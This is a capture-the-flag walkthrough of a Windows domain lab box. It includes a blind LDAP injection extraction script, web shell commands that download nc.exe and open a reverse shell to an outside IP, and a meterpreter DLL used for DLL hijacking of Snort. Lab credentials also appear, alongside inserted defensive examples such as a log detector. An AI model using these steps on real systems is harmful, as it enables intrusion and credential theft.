Analysis

OS: Windows
Difficulty: Hard
Points: 40

Nmap

ports=$(nmap -p- --min-rate=5000 -T4 10.129.96.0 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
nmap -vvv -p $ports -sC -sV -oN nmap.txt 10.129.96.0
Nmap scan report for 10.129.96.0
Host is up, received reset ttl 127 (0.074s latency).
Scanned at 2024-01-23 10:46:59 EST for 72s

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-01-23 15:47:06Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
3306/tcp  open  mysql         syn-ack ttl 127 MySQL (unauthorized)
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
33060/tcp open  mysqlx?       syn-ack ttl 127
| fingerprint-strings: 
|   LDAPBindReq: 
|     *Parse error unserializing protobuf message"
|     HY000
|   LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: 
|     Invalid message"
|     HY000
|   oracle-tns: 
|     Invalid message-frame."
|_    HY000
47001/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0

Enumeration

Fuzzing vhost.

ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -H "Host: FUZZ.analysis.htb" -u http://analysis.htb/
        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://analysis.htb/
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
 :: Header           : Host: FUZZ.analysis.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

internal                [Status: 403, Size: 1268, Words: 74, Lines: 30, Duration: 73ms]

Fuzzing directories.

gobuster dir -u http://internal.analysis.htb/ -w /usr/share/wordlists/dirb/common.txt
                  
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://internal.analysis.htb/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/dashboard            (Status: 301) [Size: 174] [--> http://internal.analysis.htb/dashboard/]
/employees            (Status: 301) [Size: 174] [--> http://internal.analysis.htb/employees/]
/users                (Status: 301) [Size: 170] [--> http://internal.analysis.htb/users/]
gobuster dir -u http://internal.analysis.htb/employees -w /usr/share/wordlists/dirb/common.txt -x php,txt,html,asp,aspx -t 20
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://internal.analysis.htb/employees
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html,asp,aspx
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/login.php            (Status: 200) [Size: 1085]
/Login.php            (Status: 200) [Size: 1085]
gobuster dir -u http://internal.analysis.htb/users -w /usr/share/wordlists/dirb/common.txt -x php,txt,html,asp,aspx -t 20
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://internal.analysis.htb/users
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html,asp,aspx
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/list.php             (Status: 200) [Size: 17]

Requesting that URL returns the following message.

curl -i http://internal.analysis.htb/users/list.php  
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/10.0
X-Powered-By: PHP/8.2.5
Date: Tue, 23 Jan 2024 16:50:06 GMT
Content-Length: 17

missing parameter

Fuzzing parameters.

ffuf -w /usr/share/wordlists/dirb/big.txt -u "http://internal.analysis.htb/users/list.php?FUZZ=jdoe" -fw 2
        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://internal.analysis.htb/users/list.php?FUZZ=jdoe
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/big.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 2
________________________________________________

name                    [Status: 200, Size: 406, Words: 11, Lines: 1, Duration: 82ms]

Enumerating users.

/opt/windows/kerbrute userenum /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -d analysis.htb --dc 10.129.96.0
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 01/23/24 - Ronnie Flathers @ropnop

2024/01/23 11:06:21 >  Using KDC(s):
2024/01/23 11:06:21 >   10.129.96.0:88

2024/01/23 11:07:12 >  [+] VALID USERNAME:       jdoe@analysis.htb
2024/01/23 11:07:55 >  [+] VALID USERNAME:       ajohnson@analysis.htb
2024/01/23 11:09:31 >  [+] VALID USERNAME:       cwilliams@analysis.htb
2024/01/23 11:10:14 >  [+] VALID USERNAME:       wsmith@analysis.htb
2024/01/23 11:12:38 >  [+] VALID USERNAME:       jangel@analysis.htb
2024/01/23 11:21:33 >  [+] VALID USERNAME:       technician@analysis.htb

LDAP Injection

We identify that the application is vulnerable to LDAP injection.

http://internal.analysis.htb/users/list.php?name=*

Fuzzing attributes.

http://internal.analysis.htb/users/list.php?name=technician)(userPassword=*

Of all the attributes we find, the one that may hold important information is description.

import string
import requests

# Blind LDAP injection: recover the description attribute of "technician" one
# character at a time. The injected value closes the name clause and appends a
# prefix match on description, e.g. (sAMAccountName=technician)(description=97N*)
URL = "http://internal.analysis.htb/users/list.php"
NO_MATCH_LEN = 406  # response length observed when the guessed prefix is wrong

# RFC 4515 filter escaping: a metacharacter in the guess is sent as \XX so it is
# matched literally (this is also how a literal '*' in the attribute is recovered)
ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29"}
CANDIDATES = [c for c in string.printable if not c.isspace()]

password = ""
while True:
    for char in CANDIDATES:
        guess = password + char
        injected = "technician)(description=" + "".join(ESCAPES.get(c, c) for c in guess) + "*"
        # params= URL-encodes the value, so ')', '&', '#', '+' and '\' reach PHP intact
        response = requests.get(URL, params={"name": injected})

        if len(response.text) != NO_MATCH_LEN:
            print(guess)
            password = guess
            break
    else:
        # no printable character extends the prefix: the attribute is fully recovered
        break

print("description:", password)

Using the script above we obtain the following password.

technician@analysis.htb : 97NTtl*4QP96Bv
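The injection works because list.php drops the name parameter straight into the search filter: `technician)(description=...` closes the name clause, and the enclosing `&` simply absorbs the extra clause. The following added example (my code, not the box's PHP) reproduces that with an assumed filter template `(&(objectClass=user)(sAMAccountName=NAME))`, a small RFC 4515 filter evaluator and a constructed two-entry directory, and shows the fix: escaping the value the way PHP's ldap_escape() with LDAP_ESCAPE_FILTER does, so the same input can only ever match literally.

```python
import re

# Constructed two-entry directory standing in for the box's AD (attribute names lowercased).
DIRECTORY = [
    {"objectclass": "user", "samaccountname": "jdoe", "description": "Helpdesk"},
    {"objectclass": "user", "samaccountname": "technician", "description": "97NTtl*4QP96Bv"},
]

# RFC 4515 filter escaping, the same character set PHP's ldap_escape($v, "", LDAP_ESCAPE_FILTER) handles.
_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\0": r"\00"}

def ldap_escape_filter(value: str) -> str:
    return "".join(_ESCAPES.get(c, c) for c in value)

def build_filter_vulnerable(name: str) -> str:
    # Assumed template: raw string concatenation, which is what the page's behaviour implies.
    return f"(&(objectClass=user)(sAMAccountName={name}))"

def build_filter_safe(name: str) -> str:
    return f"(&(objectClass=user)(sAMAccountName={ldap_escape_filter(name)}))"

def parse_filter(s: str, i: int = 0):
    """Parse an RFC 4515 filter into ('&'|'|', [kids]) / ('!', kid) / ('=', attr, pattern)."""
    if s[i] != "(":
        raise ValueError(f"expected '(' at {i}")
    i += 1
    if s[i] in "&|":
        op, kids, i = s[i], [], i + 1
        while s[i] == "(":
            kid, i = parse_filter(s, i)
            kids.append(kid)
        node = (op, kids)
    elif s[i] == "!":
        kid, i = parse_filter(s, i + 1)
        node = ("!", kid)
    else:
        eq = s.index("=", i)
        end = s.index(")", eq)  # an escaped ')' is '\29', so a literal ')' ends the clause
        node = ("=", s[i:eq].lower(), s[eq + 1:end])
        i = end
    if s[i] != ")":
        raise ValueError(f"expected ')' at {i}")
    return node, i + 1

def _unescape(s: str) -> str:
    return re.sub(r"\\([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)

def _wildcard_match(pattern: str, value: str) -> bool:
    # '*' is the only wildcard; every other byte, once unescaped, is compared literally
    parts = [_unescape(p) for p in pattern.split("*")]
    if len(parts) == 1:
        return value == parts[0]
    if len(value) < len(parts[0]) + len(parts[-1]):
        return False
    if not value.startswith(parts[0]) or not value.endswith(parts[-1]):
        return False
    pos, stop = len(parts[0]), len(value) - len(parts[-1])
    for mid in parts[1:-1]:
        idx = value.find(mid, pos, stop)
        if idx < 0:
            return False
        pos = idx + len(mid)
    return True

def matches(node, entry: dict) -> bool:
    kind = node[0]
    if kind == "&":
        return all(matches(k, entry) for k in node[1])
    if kind == "|":
        return any(matches(k, entry) for k in node[1])
    if kind == "!":
        return not matches(node[1], entry)
    _, attr, pattern = node
    return attr in entry and _wildcard_match(pattern, entry[attr])

def search(filter_str: str, directory=DIRECTORY):
    """Return the sAMAccountNames matched by a complete filter string."""
    node, end = parse_filter(filter_str)
    if end != len(filter_str):
        raise ValueError("trailing data after filter")
    return [e["samaccountname"] for e in directory if matches(node, e)]

if __name__ == "__main__":
    for name in ["jdoe", "*", "technician)(description=97N*"]:
        print(f"{name!r}: vulnerable -> {search(build_filter_vulnerable(name))}, "
              f"escaped -> {search(build_filter_safe(name))}")
```

With the vulnerable template, `*` lists every user and the `)(description=97N*` suffix becomes a third clause of the AND, which is exactly what the extraction loop above relies on; with the escaped template both inputs are compared as literal account names and match nothing.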

File Upload Reverse Shell

Using the obtained credentials we can authenticate on the login portal.

http://internal.analysis.htb/employees/login.php

We can upload a web shell in the application.

http://internal.analysis.htb/dashboard/form.php

We will use the following commands to obtain a reverse shell.

http://internal.analysis.htb/dashboard/uploads/shell.php?cmd=mkdir+c:\temp
http://internal.analysis.htb/dashboard/uploads/shell.php?cmd=curl+10.10.14.9/nc.exe+-o+c:\temp\nc.exe
http://internal.analysis.htb/dashboard/uploads/shell.php?cmd=c:\temp\nc.exe+10.10.14.9+1234+-e+cmd.exe
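From the defensive side, both the list.php injection and the shell.php command requests leave distinctive traces in the IIS access log: LDAP metacharacters inside a query value, and a PHP file under an upload directory being called with a command parameter. The following added example (mine, not part of the writeup) runs three simple rules over constructed W3C log lines modelled on the requests in these two sections; the field order, the sample lines and the rule thresholds are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log lines (not taken from the box). Assumed field order:
# date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
SAMPLE_LOG = """\
2024-01-23 16:50:06 10.129.96.0 GET /users/list.php name=jdoe 80 - 10.10.14.9 curl/8.5.0 200
2024-01-23 16:52:10 10.129.96.0 GET /users/list.php name=* 80 - 10.10.14.9 Mozilla/5.0 200
2024-01-23 16:53:41 10.129.96.0 GET /users/list.php name=technician%29%28description%3D9%2A 80 - 10.10.14.9 python-requests/2.31.0 200
2024-01-23 17:05:02 10.129.96.0 GET /dashboard/uploads/shell.php cmd=c:\\temp\\nc.exe+10.10.14.9+1234+-e+cmd.exe 80 - 10.10.14.9 Mozilla/5.0 200
2024-01-23 17:05:30 10.129.96.0 GET /dashboard/form.php - 80 technician 10.10.14.9 Mozilla/5.0 200
"""

FIELDS = ["date", "time", "s_ip", "method", "stem", "query", "port", "user", "c_ip", "ua", "status"]

def parse_line(line: str):
    """Split one W3C line into a dict; the query is URL-decoded so encoded payloads are visible."""
    values = line.split(" ")
    if len(values) != len(FIELDS):
        return None
    rec = dict(zip(FIELDS, values))
    rec["query"] = "" if rec["query"] == "-" else unquote_plus(rec["query"])
    return rec

# Rule 1: LDAP filter metacharacters in a parameter value. ')(' closes one clause and
# opens another; a '*' right after '=' turns an equality test into a presence test.
LDAP_INJECTION = re.compile(r"\)\s*\(|(?<![\w\\])\*")
# Rule 2: a PHP script under an upload directory invoked with a shell-like parameter.
WEBSHELL_PATH = re.compile(r"/uploads?/[^/]+\.php$", re.IGNORECASE)
WEBSHELL_PARAM = re.compile(r"(^|&)(cmd|command|exec)=", re.IGNORECASE)
# Rule 3: tooling names in any query string (what the page's shell.php requests carried).
TOOLING = re.compile(r"\b(nc\.exe|cmd\.exe|powershell|certutil|curl)\b", re.IGNORECASE)

def detect(line: str):
    """Return the names of the rules a single log line triggers."""
    rec = parse_line(line)
    if rec is None:
        return []
    hits = []
    if LDAP_INJECTION.search(rec["query"]):
        hits.append("ldap-injection")
    if WEBSHELL_PATH.search(rec["stem"]) and WEBSHELL_PARAM.search(rec["query"]):
        hits.append("webshell-command")
    if TOOLING.search(rec["query"]):
        hits.append("tooling-in-query")
    return hits

def scan(log_text: str):
    """Return (line number, rule names) for every line that triggers at least one rule."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        hits = detect(line)
        if hits:
            findings.append((n, hits))
    return findings

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(hits)}")
```

The decode step matters: the third sample line carries the same `)(` payload as the second section of this writeup, only percent-encoded, and a rule that matched on the raw cs-uri-query field would miss it.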

Lateral Movement

Using winPEAS we find the password of user jdoe.

We connect via WinRM.

evil-winrm -i 10.10.11.250 -u 'jdoe' -p '7y4Z4^*y9Zzj'
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\jdoe\Documents> type ..\Desktop\user.txt
2234595e802096e282d2f9e421e6d664                                                                                                                             
*Evil-WinRM* PS C:\Users\jdoe\Documents>

Privilege Escalation

Binary with a possible DLL hijacking.

Snort(Snort)[C:\Snort\bin\snort.exe /SERVICE] - Autoload - No quotes and Space detected
Possible DLL Hijacking in binary folder: C:\Snort\bin (Users [AppendData/CreateDirectories WriteData/CreateFiles])
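The winPEAS finding has two parts. The "No quotes and Space detected" part is a false alarm for this ImagePath: the only space sits between snort.exe and its /SERVICE argument, so there is no shorter prefix for Windows to try first. The part that matters is the ACL: BUILTIN\Users can create files in C:\Snort\bin, and Snort additionally loads modules from the preprocessor directory named in snort.conf. The following added example (mine, not winPEAS and not the box's tooling) reimplements both checks over constructed input; the ACL entries, the right labels and the snort.conf load directory are assumptions modelled on what the page shows.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Ace:
    principal: str
    rights: frozenset

# Groups every interactive user belongs to; write access for them means file planting.
LOW_PRIV = {"BUILTIN\\Users", "NT AUTHORITY\\Authenticated Users", "Everyone"}
# Right labels as winPEAS prints them (the page shows the first two for C:\Snort\bin).
WRITE_RIGHTS = {"WriteData/CreateFiles", "AppendData/CreateDirectories", "Write", "Modify", "FullControl"}

def unquoted_path_candidates(image_path: str):
    """Paths CreateProcess tries, in order, for a service ImagePath (one path if quoted)."""
    s = image_path.strip()
    if s.startswith('"'):
        return [s[1:s.index('"', 1)]]
    tokens = s.split(" ")
    candidates = []
    for i in range(1, len(tokens) + 1):
        cand = " ".join(tokens[:i])
        if cand.lower().endswith(".exe"):
            candidates.append(cand)
            break  # the first prefix naming an .exe is the intended binary; the rest are arguments
        candidates.append(cand + ".exe")
    return candidates

def writable_by(aces):
    """Low-privilege principals that hold a write right on the directory."""
    return sorted(a.principal for a in aces if a.principal in LOW_PRIV and a.rights & WRITE_RIGHTS)

def _acl(dir_acls, directory):
    # NTFS paths are case-insensitive, so look the directory up that way
    return next((v for k, v in dir_acls.items() if k.lower() == directory.lower()), [])

def audit_service(name: str, image_path: str, dir_acls: dict, load_dirs=()):
    """dir_acls maps directory -> [Ace]; load_dirs are extra module directories the binary uses."""
    findings = []
    cands = unquoted_path_candidates(image_path)
    # Unquoted-path risk: a shorter candidate whose parent directory a low-priv user can write to.
    for shorter in cands[:-1]:
        writers = writable_by(_acl(dir_acls, shorter.rsplit("\\", 1)[0]))
        if writers:
            findings.append(f"{name}: unquoted path, {writers} can plant {shorter}")
    # DLL hijacking risk: the binary's own directory, plus every directory it loads modules from.
    bin_dir = cands[-1].rsplit("\\", 1)[0]
    for directory in (bin_dir, *load_dirs):
        writers = writable_by(_acl(dir_acls, directory))
        if writers:
            findings.append(f"{name}: DLL hijacking, {directory} writable by {writers}")
    return findings

# Constructed input modelled on the page: Snort's ImagePath, the bin folder ACL winPEAS
# reported, and the preprocessor directory snort.conf points at (its ACL is assumed).
SNORT_IMAGE_PATH = r"C:\Snort\bin\snort.exe /SERVICE"
SNORT_LOAD_DIRS = [r"C:\Snort\lib\snort_dynamicpreprocessor"]
DIR_ACLS = {
    r"C:\Snort\bin": [
        Ace("NT AUTHORITY\\SYSTEM", frozenset({"FullControl"})),
        Ace("BUILTIN\\Users", frozenset({"ReadAndExecute", "WriteData/CreateFiles", "AppendData/CreateDirectories"})),
    ],
    r"C:\snort\lib\snort_dynamicpreprocessor": [
        Ace("NT AUTHORITY\\SYSTEM", frozenset({"FullControl"})),
        Ace("BUILTIN\\Users", frozenset({"ReadAndExecute", "Modify"})),
    ],
}

if __name__ == "__main__":
    for finding in audit_service("Snort", SNORT_IMAGE_PATH, DIR_ACLS, SNORT_LOAD_DIRS):
        print(finding)
```

The second check is the one an ACL-only scanner misses: the writeup plants its DLL in the lib\snort_dynamicpreprocessor directory, not in bin, so an audit that stops at the service binary's folder reports nothing about the path actually used. The remediation is the same for both directories: remove the Users write entries so that only administrators and the service account can create files there.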

Snort configuration.

type C:\snort\etc\snort.conf

DLL Hijacking

Create the DLL.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.9 LPORT=4444 -f dll -o sf_engine.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 9216 bytes
Saved as: sf_engine.dll

Configure Metasploit.

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost tun0
set lport 4444
run

Upload the DLL.

upload /root/htb/Box/Analysis/sf_engine.dll C:\snort\lib\snort_dynamicpreprocessor\sf_engine.dll
Info: Uploading /root/htb/Box/Analysis/shell.dll to C:\snort\lib\snort_dynamicpreprocessor\shell.dll
                                        
Data: 12288 bytes of 12288 bytes copied
                                        
Info: Upload successful!

Once Metasploit is configured we wait a minute for the shell to come back.

References

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/README.md#defaults-attributes
https://hyp3rlinx.altervista.org/advisories/SNORT-DLL-HIJACK.txt